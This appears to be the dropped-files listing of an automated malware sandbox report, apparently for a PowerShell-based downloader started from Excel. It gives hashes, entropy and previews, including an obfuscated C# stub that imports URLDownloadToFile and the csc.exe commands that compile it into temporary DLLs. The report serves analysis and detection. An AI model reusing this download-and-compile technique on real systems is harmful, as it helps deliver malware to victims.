                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:24:06 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1328
                                                                                                                                                                                                                    Entropy (8bit):4.00217393375807
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:Hrke9EurCqcdHdsfwKdNWI+ycuZhNPZakSkuPNnqSqd:VrCqc9soKd41ulPZa3kyqSK
                                                                                                                                                                                                                    MD5:546545F4C4EAD35E2A5C5DBCBA5515CB
                                                                                                                                                                                                                    SHA1:35C623A77A194B95DEE304B178B2B5364AEF01C4
                                                                                                                                                                                                                    SHA-256:BC497967C2222323FCCF7EA966AA980549AD2722B8941152900D1C4198091F43
                                                                                                                                                                                                                    SHA-512:905D4A1238BD9348A5FA1DB5BEF94B4C666F113BF6BFBCCA66470D417B7C6974D42B6731F95A3B12C2D7ED09A6F38FF28A7EE82E622696B55FFA9D262DF344DD
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:L...v2.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP................J..`......X...........4.......C:\Users\user\AppData\Local\Temp\RES87A7.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.k.z.g.b.m.k.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x129d030b, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):21037056
                                                                                                                                                                                                                    Entropy (8bit):1.139281788866674
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24576:QP1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:QPEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                                                    MD5:1ACEC35C957DE75D08731D0109237C0E
                                                                                                                                                                                                                    SHA1:FA322CA2E573A11157A7413CF5E34CE641C69049
                                                                                                                                                                                                                    SHA-256:85CA20A86AAF382B777B750164944A8050E0B2FE2D9D4F995758D2834F72FD0D
                                                                                                                                                                                                                    SHA-512:88927487CD7BBB6AD88A41D48EC7A3C04C7380A48357BA845C93CEDBC32BE502883D9FC2E38C7F2A6CCFEBFC73AF5734C0B433E6D88D6B94B7EFDA61A011B5BC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                                                                    Entropy (8bit):3.1005663540773236
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytZak7YnqqkuPN5Dlq5J:+RI+ycuZhNPZakSkuPNnqX
                                                                                                                                                                                                                    MD5:4AC8B6D3B6601A11CC18EA93B29F58DC
                                                                                                                                                                                                                    SHA1:49FAD11CE350F945A68AB1788914C2DE653BE573
                                                                                                                                                                                                                    SHA-256:E637CF080BBC621CD21820072CA443BC1C01BF308B0699E77952EA7F200C6AA4
                                                                                                                                                                                                                    SHA-512:50D9675F8C90880DE3298CA8B0114572F03FBD44033FB05C2ABA26AB2E3B17BCCCB20FFB40B6B514852B8510BE64D67D7038F31B21F329E90A9EFFCA25BC4406
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.k.z.g.b.m.k.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.k.z.g.b.m.k.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):479
                                                                                                                                                                                                                    Entropy (8bit):3.822048982650369
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:V/DsYLDS81zuQ48QmMCQXReKJ8SRHy4Ht4gNybCFPTlNgYT3/Qy:V/DTLDfuQ4jXfHp9Nybcx6/y
                                                                                                                                                                                                                    MD5:BDE88A612A03E923DA5AB7EA68AEC3C7
                                                                                                                                                                                                                    SHA1:794B2B8DAFAC37753258A45CCFD9D07647D6B3E2
                                                                                                                                                                                                                    SHA-256:2130C7B5A1D3CC5B571622ABF744C66265C625E805EBF608006BB169439922FC
                                                                                                                                                                                                                    SHA-512:AB2550558A98FAFE1BCFFC9260D7E8DABDBEB85CD23E291D46161AADC86CBFC853CC0DD3538729ACDCA0402496E94C71F7BC08A85E09BBDC0DF153978B5A78C1
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace ThScHUII.{. public class D. {. [DllImport("uRLmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr tMYmJgj,string mFyVMhW,string ezXEPj,uint ZeixdZoVD,IntPtr mulcefBZ);.. }..}.
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):369
                                                                                                                                                                                                                    Entropy (8bit):5.233440390315943
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fXBUzxs7+AEszIP23fXV9:p37Lvkmb6KzOWZEot9
                                                                                                                                                                                                                    MD5:BCC6822CEC1CA517FE5DB825DDAF458B
                                                                                                                                                                                                                    SHA1:4867E4DE19F70A9033A65F5399317F5B4B213F11
                                                                                                                                                                                                                    SHA-256:879AEE982D8E336AA8821F1F1E90031DD51D7C2396892CFB039E2E44406D4E5E
                                                                                                                                                                                                                    SHA-512:09887452AF2643CF5F52AA5855720E5D414F8B15B77268509CA4CEC82D45FE28D69541C0116A5349A74DA4A6300A4F485C358A10FB8255B88EC790BB34B7AD78
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.0.cs"
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                    Entropy (8bit):2.840470602898936
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:6llFskr+lUtvCUvDJZVbCZX1ulPZa3kyq:8jiGaVedZKk
                                                                                                                                                                                                                    MD5:DDE87593A0752A17F4A4B1D801F32A1C
                                                                                                                                                                                                                    SHA1:50E9D38A830754251B52FDB1BEC706C848AE9B5D
                                                                                                                                                                                                                    SHA-256:515853DEE219753C535079CBC5868857B0B2D2A977E9A2D6C20628EDC717DFBF
                                                                                                                                                                                                                    SHA-512:F1E3CC6F817CECD4A0A883C2DCFB58C08C3D5CD9FCFEC7AB2FF2562F0E2579517011EFA4925E18CF2BC32EB1E268BBF5A0434633E2E6178997A4912E2BF96FED
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):866
                                                                                                                                                                                                                    Entropy (8bit):5.3425022484268085
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:AId3ka6KzPEot4KaMD5DqBVKVrdFAMBJTH:Akka60PEot4KdDcVKdBJj
                                                                                                                                                                                                                    MD5:56786F37F8D0BF00E2471D9E4C966BAD
                                                                                                                                                                                                                    SHA1:B661B5D36717F1C1C07CB5E065D0CCC7ACB4127F
                                                                                                                                                                                                                    SHA-256:1F112E515DB2ACE83380AC69B7BD4EC61949A0015C21EED718452AC5951BB8F9
                                                                                                                                                                                                                    SHA-512:136F716C121B42F89AC4FD607E3F624177062A3AE24285CDBA9171E71790540E5912A33B96D7B9E4856A757B1D0DE76F2D24B487D7E958103153E61222E8E1F4
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                                                                    Entropy (8bit):3.1039241208595985
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRak7YnqqlPN5Dlq5J:+RI+ycuZhNjakSlPNnqX
                                                                                                                                                                                                                    MD5:75DBB5D08F27105A063CB68C37400DB1
                                                                                                                                                                                                                    SHA1:85957F276EED13B0BA74CA8D4787B23BC8A5C81F
                                                                                                                                                                                                                    SHA-256:DF6C29551E7A38BCED0CD9A2FB1EF35C35C7567CF8BA474F701D02051BCCC41C
                                                                                                                                                                                                                    SHA-512:B022E9E331B66F38E0015C28BE888C5BBF47724AA6D78B8CF325171E5DD2D670E7ED862EA37B226975CF710C09DC4969BAC52B641B3FD13245D45E5F229F0D7C
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.v.r.r.k.y.h.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.v.r.r.k.y.h.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):479
                                                                                                                                                                                                                    Entropy (8bit):3.822048982650369
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:V/DsYLDS81zuQ48QmMCQXReKJ8SRHy4Ht4gNybCFPTlNgYT3/Qy:V/DTLDfuQ4jXfHp9Nybcx6/y
                                                                                                                                                                                                                    MD5:BDE88A612A03E923DA5AB7EA68AEC3C7
                                                                                                                                                                                                                    SHA1:794B2B8DAFAC37753258A45CCFD9D07647D6B3E2
                                                                                                                                                                                                                    SHA-256:2130C7B5A1D3CC5B571622ABF744C66265C625E805EBF608006BB169439922FC
                                                                                                                                                                                                                    SHA-512:AB2550558A98FAFE1BCFFC9260D7E8DABDBEB85CD23E291D46161AADC86CBFC853CC0DD3538729ACDCA0402496E94C71F7BC08A85E09BBDC0DF153978B5A78C1
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace ThScHUII.{. public class D. {. [DllImport("uRLmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr tMYmJgj,string mFyVMhW,string ezXEPj,uint ZeixdZoVD,IntPtr mulcefBZ);.. }..}.
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):369
                                                                                                                                                                                                                    Entropy (8bit):5.269401370646196
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fCd6/+zxs7+AEszIP23fCd6QA:p37Lvkmb6Kz6d9WZEo6dY
                                                                                                                                                                                                                    MD5:5BE641F3BC91A079812877F12E229712
                                                                                                                                                                                                                    SHA1:BD762B2A73FC70E28581C593AE8CC29DE975B408
                                                                                                                                                                                                                    SHA-256:3E30A2398D35947AB0B5CDB78A678A83B3A5448A4DBF19ED6C6608A3B2E87A39
                                                                                                                                                                                                                    SHA-512:1082A15C3896B89D7A084A48F39D32A1C4972F457C4F2C1BCE08B76C7F337316953CB48302EBB838F1306348EEE4DDDF27CCD679475A9F85E935E2A4FE8A2824
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.0.cs"
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                    Entropy (8bit):2.838716538662028
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:6qlFskr+lUtvCUXDJH1kbCZX1ulja3/q:djiGa6eBK
                                                                                                                                                                                                                    MD5:99A69E724ED32841148124B6F6E9EC9E
                                                                                                                                                                                                                    SHA1:D9D3D204885C48C97DC5714F423051FF48E72228
                                                                                                                                                                                                                    SHA-256:FFD61AD696E541191922E248CA9BF2CEF359DBAB542B7EFF7E4124E53AA8ADDB
                                                                                                                                                                                                                    SHA-512:2CB3559B699D4CA61620CF090CEFB8B67F7DEA423552A1F22AAE45A8D1690A5B7CE24862908C260CF73F894C294ECF5E21FB2C582E8F1724A43EAFFA2240B962
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):866
                                                                                                                                                                                                                    Entropy (8bit):5.328942012999451
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:AId3ka6Kz6QEo6fKaMD5DqBVKVrdFAMBJTH:Akka60fEoyKdDcVKdBJj
                                                                                                                                                                                                                    MD5:35CBCC39A53EAAC9E8DF342815FBBEE5
                                                                                                                                                                                                                    SHA1:E7E410760AD2626E8EFCB56D5BB9611B6ACFC636
                                                                                                                                                                                                                    SHA-256:4D5CD19922A66979BA72CA71936B762C7856698DCB032695E70C68726C997995
                                                                                                                                                                                                                    SHA-512:85FCD2B818E31AA5A059DBCBE16C5167562ACF80242B1401E58FE0DB05C4E8E291EC2D000B695DE279E914EE75A99D62840A590DC8168A32EA9C93E0EBFC2CD2
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):195560
                                                                                                                                                                                                                    Entropy (8bit):3.7210597034966684
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3072:kXvVPVWplSFblsHb6LBgt5poGwNqmM5pfir3RkQ5Pxl5Ax3pTgROVnjRv:qVPVWpy5sHGXqj2Z5Luh9eOVjRv
                                                                                                                                                                                                                    MD5:FFA76C6571F4F3D4E5E256586A8390B6
                                                                                                                                                                                                                    SHA1:00854060B1673D298068AAF9248129EFE750EB93
                                                                                                                                                                                                                    SHA-256:9E97607E9FB8CA4C56D9754B0A6D3FCD24B9816DC62DE63BE73869B17E5E8B24
